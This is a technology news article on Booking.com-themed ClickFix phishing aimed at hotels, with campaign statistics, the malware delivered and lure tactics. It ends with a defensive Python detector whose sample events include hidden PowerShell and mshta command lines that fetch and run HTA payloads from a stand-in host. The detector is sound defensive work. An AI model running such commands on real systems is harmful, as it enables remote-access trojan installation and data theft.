ChannelLife India - Industry insider news for technology resellers

ClickFix phishing surge spoofs Booking.com to target hotels

Today

Research from Cofense Intelligence has identified a series of Booking.com-themed phishing campaigns targeting hotel chains in the accommodation and food services sector.

These campaigns have been ongoing since November 2024, with a significant increase observed in March 2025, accounting for 47% of the total campaign volume. The phishing emails impersonate Booking.com, directing recipients to a fake CAPTCHA website that prompts them to run a malicious script. This method of malware delivery, known as a ClickFix attack, is designed to convince users to execute scripts which install remote access trojans (RATs) or information-stealing malware.

ClickFix attacks are distinguished by their use of fake CAPTCHA screens that convincingly mimic brands such as Booking.com and Cloudflare. When users interact with these fake verifications, they are instructed to carry out steps, such as using Windows keyboard shortcuts, to inadvertently run a malicious script. This script is commonly delivered through users' clipboards, typically triggered by a specific button on the fraudulent site.

Analysis from Cofense Intelligence shows that 75% of campaigns using fake CAPTCHAs employed Booking.com spoofing templates, while other less frequent variants mimic Cloudflare Turnstile CAPTCHAs and cookie consent banners. Among these, 64% delivered RATs, 47% information stealers, and 11% were observed distributing both types of malware.

This campaign has been increasing in popularity since November 2024, with 47% of total campaign volume being from March 2025 alone. 75% of all active threat reports (ATRs) with fake CAPTCHAs used Booking.com-spoofing ClickFix templates. Other notable but rare ClickFix templates include Cloudflare Turnstile-spoofing and cookie consent banner-styled templates. 64% of campaign ATRs delivered RATs, 47% of campaign ATRs delivered information stealers, and 11% of campaign ATRs were seen delivering both RATs and information stealers. 53% of all campaign ATRs deliver XWorm RAT, making it the most popular RAT used in these campaigns. Pure Logs Stealer (19% of ATRs) and DanaBot (14% of ATRs) are the most popular information stealers for these campaigns.

The most commonly observed malware is the XWorm RAT, present in 53% of the analysed campaigns. Other malware includes Pure Logs Stealer and DanaBot, making up 19% and 14% of cases, respectively.

The content and tone of the phishing emails have evolved since the campaign's inception. Earlier messages featured generic or vague language, whereas more recent examples exploit concerns over guest satisfaction and incorporate references to specific guest reservations. These tactics are designed to elicit a response and drive the recipient to interact with malicious links.

Some emails specify that the link will only function on Windows, and recipients who open the site on other operating systems are shown a message stating this limitation. The malicious scripts are typically delivered as PowerShell commands or Microsoft HTML applications (HTA files), which, once executed, can install RATs or steal data from the victim's device.

ClickFix is described as a technique for persuading victims to run malicious Windows scripts themselves, often by pasting code into the Windows Run command prompt. Sometimes, these scripts are obfuscated to appear as verification codes, increasing the likelihood that the user will not recognise them as harmful.
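Because the Run box launches whatever is pasted into it as a child of explorer.exe, the technique leaves a recognisable process-creation footprint. The following detection logic is an added example written for this article, not Cofense's or any vendor's code; it runs over constructed Sysmon-style process-creation records and flags a script host (PowerShell, mshta, cmd) started from explorer.exe with a URL, hidden window, encoded/bypass policy flag or HTA payload on its command line.

```python
import re

# Constructed Sysmon-style process-creation records (sample data, not real telemetry).
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -w hidden -nop -c "Start-Process $env:TEMP\\verify.hta"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://captcha-check.example.invalid/verify"},
    {"parent": r"C:\Program Files\Backup\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\scripts\\nightly-backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
]

# Script hosts a ClickFix lure asks the victim to launch. A command pasted into the
# Run box starts as a child of explorer.exe, so that parent/child pair is the anchor.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
LAUNCHER = "explorer.exe"

# Command-line traits typical of the pasted "verification" command.
SUSPICIOUS = {
    "url": re.compile(r"https?://", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded_or_bypass": re.compile(r"-(?:e(?:nc|ncodedcommand)?|ep|executionpolicy)\b", re.I),
    "hta_payload": re.compile(r"\.hta\b", re.I),
}

def basename(path):
    """Last path component, lower-cased, tolerating either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return the matched traits for one event; an empty list means no alert."""
    if basename(event["parent"]) != LAUNCHER or basename(event["image"]) not in SCRIPT_HOSTS:
        return []
    return [name for name, rx in SUSPICIOUS.items() if rx.search(event["cmdline"])]

def find_clickfix_candidates(events):
    """(command line, traits) for every event that matches at least one trait."""
    return [(e["cmdline"], traits) for e in events if (traits := classify(e))]

if __name__ == "__main__":
    for cmdline, traits in find_clickfix_candidates(SAMPLE_EVENTS):
        print(f"ALERT {traits}: {cmdline}")
```

The scheduled-task PowerShell run and the Notepad launch are left alone because the parent/child relationship is the filter, not the interpreter name by itself.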

In addition to fraudulent CAPTCHA screens, recent campaigns include cookie consent banners that prompt users to run malicious scripts under the pretext of accepting cookies.
